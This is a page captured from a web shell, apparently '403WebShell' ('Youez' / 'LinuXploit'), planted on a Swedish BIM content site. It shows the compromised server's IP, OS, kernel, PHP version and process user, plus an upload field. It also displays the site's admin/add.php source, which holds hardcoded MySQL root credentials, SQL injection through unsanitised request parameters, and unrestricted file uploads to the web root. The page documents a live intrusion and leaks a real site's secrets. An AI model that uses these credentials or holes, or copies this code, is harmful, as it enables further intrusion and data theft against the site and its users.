403WebShell

????JFIF??x?x????'403WebShell403Webshell

Server IP : 79.136.114.73 / Your IP : 3.144.156.43
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/www/www.biminfo.se/admin/

Upload File :

[ Back ]

Current File : /var/www/www.biminfo.se/admin/add.php

<?php
session_start();


	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("biminfo");
	$id = $_GET['customerid'];
	   $sql = "SELECT * FROM tblCustomer where customerid=$id";
		   $result = mysql_query($sql);
		
			  while ($row = mysql_fetch_assoc($result)){ 
			  $customer=	$row['customer'];
			  $nbr = $row['nbr'];
			  }
			  
			  
if($_GET['action'] == "add"){


	if($_POST['hide'] == "1"){
		$hide = 1;
	}else{
		$hide = 0;
	}
		$category = $_POST['category'];

	if($_FILES['path']['name'] != ""){
		if($_POST['type'] == 1){
			$target_path_model = "/var/www/www.biminfo.se/data/models/";
		}else{
			$target_path_model = "/var/www/www.biminfo.se/data/extensions/";
		}
		
		$target_path_model = $target_path_model . basename( $_FILES['path']['name']); 
		move_uploaded_file($_FILES['path']['tmp_name'], $target_path_model);
		
	if($_POST['type'] == 1){
			$target_path_model = "data/models/".basename( $_FILES['path']['name']);
		}else{
			$target_path_model = "data/extensions/".basename( $_FILES['path']['name']);
		}
	}
	
	if($_FILES['thumb']['name'] != ""){
		$target_path_thumb = "/var/www/www.biminfo.se/data/thumbs/";
		$target_path_thumb = $target_path_thumb . basename( $_FILES['thumb']['name']); 
		move_uploaded_file($_FILES['thumb']['tmp_name'], $target_path_thumb);
		$target_path_thumb = "data/thumbs/".basename( $_FILES['thumb']['name']);
	}
	
    $sql = "INSERT INTO tblContent (id ,customerid ,linkid ,model ,size ,color ,ctype ,path ,thumb ,keywords ,categoryid ,cdesc ,hide ,betyg ,klick) VALUES (NULL , '".$_GET['customerid']."', '".$_POST['linkid']."', '".$_POST['model']."', '".$_POST['size']."', '".$_POST['color']."', '".$_POST['type']."', '".$target_path_model."', '".$target_path_thumb."', '".$_POST['keywords']."', '".$_POST['category']."', '".$_POST['desc']."', '".$hide."', '3', '1')";

	$result = mysql_query($sql);
	
	$newnbr = $nbr + 1;
	$sql = "UPDATE tblCustomer SET nbr = $newnbr where customerid=$id";
	$result = mysql_query($sql);
	
	 $sql = "SELECT * FROM tblCategory where id = $category";
	 echo( $sql );
		   $result = mysql_query($sql);
		
			  while ($row = mysql_fetch_assoc($result)){ 
			
			  $nbr = $row['nbr'];
			  }
	
	$newnbr = $nbr + 1;
	$sql = "UPDATE tblCategory SET nbr = $newnbr where id=$category";
	$result = mysql_query($sql);


	
}
	
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Untitled Document</title>
<style type="text/css">
<!--
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
.style10 {
	font-size: 16px;
	font-weight: bold;
}
.style13 {font-size: 16; font-weight: bold; }
-->
</style>
</head>

<body>
<div align="center" class="style6 style10">
  <p>Inloggad som kund: AstacusAdmin </p>
  <br>
    <hr width="600" noshade>
        <br>
    
	
			
  </span>
<form name="form2" method="post" action="http://www.biminfo.se/?page=add&action=add&customerid=<?php echo($_GET['customerid']);?>" enctype="multipart/form-data">
  <table width="643" border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td width="148" height="124" valign="top">&nbsp;</td>
      <td width="452" valign="top"><table width="513" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td width="367"><table width="405" border="0" cellspacing="0" cellpadding="0">
                <tr class="style6">
                  <td width="99">Tillverkare:</td>
                  <td width="268" height="20"><?php echo($customer);?></td>
                </tr>
                <tr class="style6">
                  <td>Namn:</td>
                  <td width="268" height="10"><input name="model" type="text" id="model" value="" size="30">
</td>
                </tr>
                <tr class="style6">
                  <td>Kategori:</td>
                  <td width="268" height="10">
				  <select name="category" id="category">
				  <?php 
				     $sql = "SELECT * FROM tblCategory ";
		  			 $result = mysql_query($sql);
		
					  while ($row = mysql_fetch_assoc($result)){ 
					      $name=	$row['name'];
						   $id=	$row['id'];
					  
				  ?>
				  
                    <option value="<?php echo($id);?>"><?php echo($name);?></option>
                 
					<?php }?>
                  </select> 
                    <a href="#">L&auml;gg till </a></td>
                </tr>
               
                <tr class="style6">
                  <td><span class="style13">Storlek:</span></td>
                  <td height="10"><input name="size" type="text" id="size" value="" size="30" >
                  </td>
                </tr>
                <tr class="style6">
                  <td><span class="style13">F&auml;rg:</span></td>
                  <td height="10"><input name="color" type="text" id="color" value="" size="30" ></td>
                </tr>
              
                <tr class="style6">
                  <td>L&auml;nk-ID:</td>
                  <td height="1"><input name="linkid" type="text" id="linkid" value="XXXXXX" size="30">
                   </td>
                </tr>
                <tr class="style6">
                  <td>Type:</td>
                  <td height="1">
				  <select name="type">
                    <option value="1">Revit</option>
                    <option value="2">Extension</option>
                    </select></td>
                </tr>
                <tr class="style6">
                  <td>Desc:</td>
                  <td height="1"><textarea name="desc" cols="30" id="desc"></textarea></td>
                </tr>
                <tr class="style6">
                  <td>Revit-fil (ZIP): </td>
                  <td height="2"><input type="file" name="path" ></td>
                </tr>
                <tr class="style6">
                  <td>Tumnagel:</td>
                  <td height="5"><input type="file" name="thumb" ></td>
                </tr>
                <tr class="style6">
                  <td valign="top">Keywords</td>
                  <td height="10"><textarea name="keywords" cols="30" id="keywords"></textarea>
                    <br>
                    <br>
                    If it is Revit Architecture, add <em>revit</em> as keyword, if MEP, add <em>mep</em>, if Structure add <em>structure</em>. Some other keywords will be added automatically.</td>
                </tr>
            
            </table></td>
            <td width="116"><div align="center"><span class="style28">
                <input name="hide" type="checkbox" id="hide" value="1" >
                D&ouml;lj
                <input type="submit" name="Submit" value="L&auml;gg till!">
                <br>
            </span> </div></td>
          </tr>
      </table></td>
    </tr>
  </table>
</form>

<br>
	
    <br>  
      <hr width="600" noshade>
    <p>&nbsp;</p>
  
  <p>&nbsp;</p>
</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit